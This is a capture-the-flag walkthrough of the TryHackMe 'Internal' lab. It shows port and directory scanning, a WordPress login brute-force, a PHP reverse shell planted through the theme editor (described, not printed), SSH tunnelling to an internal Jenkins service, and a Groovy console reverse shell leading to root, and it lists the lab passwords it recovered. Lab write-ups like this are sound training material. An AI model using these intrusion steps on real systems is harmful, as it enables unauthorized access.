TryHackMe - Internal

Posted on Edited on In Views: Disqus: Word count in article: 147 Reading time ≈ 1 mins.
WordPress, Port Forwarding, and Jenkins Exploitation

Internal

internal

Enumeration

1
2
3
4
5
6
7
8
9
➜  tmp rustscan -a 10.10.103.231
Open 10.10.103.231:53
Open 10.10.103.231:22
Open 10.10.103.231:80

➜  tmp gobuster dir -u http://10.10.103.231/ -w /usr/share/dirb/wordlists/big.txt
...
/blog                 (Status: 301) [Size: 313] [--> http://10.10.103.231/blog/]
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.103.231/wordpress/]

WordPress Scanning

1
2
3
wscan --url http://10.10.103.231/blog --usernames admin --passwords rockyou.txt
[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

Exploitation

  1. Found credentials in a private post: william:arnold147.
  2. Uploaded PHP reverse shell via WordPress theme editor (404.php).
  3. Found Aubreanna's credentials in /opt/wp-save.txt: aubreanna:bubb13guM!@#123.

Post-Exploitation

Jenkins Access

Found jenkins.txt indicating a service on 172.17.0.2:8080.

1
ssh -L 9999:172.17.0.2:8080 aubreanna@internal.thm

Brute-forced Jenkins login: - admin:spongebob

Root Access

Executed Groovy script in Jenkins script console to get a reverse shell. Found root credentials in /opt/note.txt: - root:tr0ub13guM!@#123

1
2
ssh root@internal.thm
# cat root.txt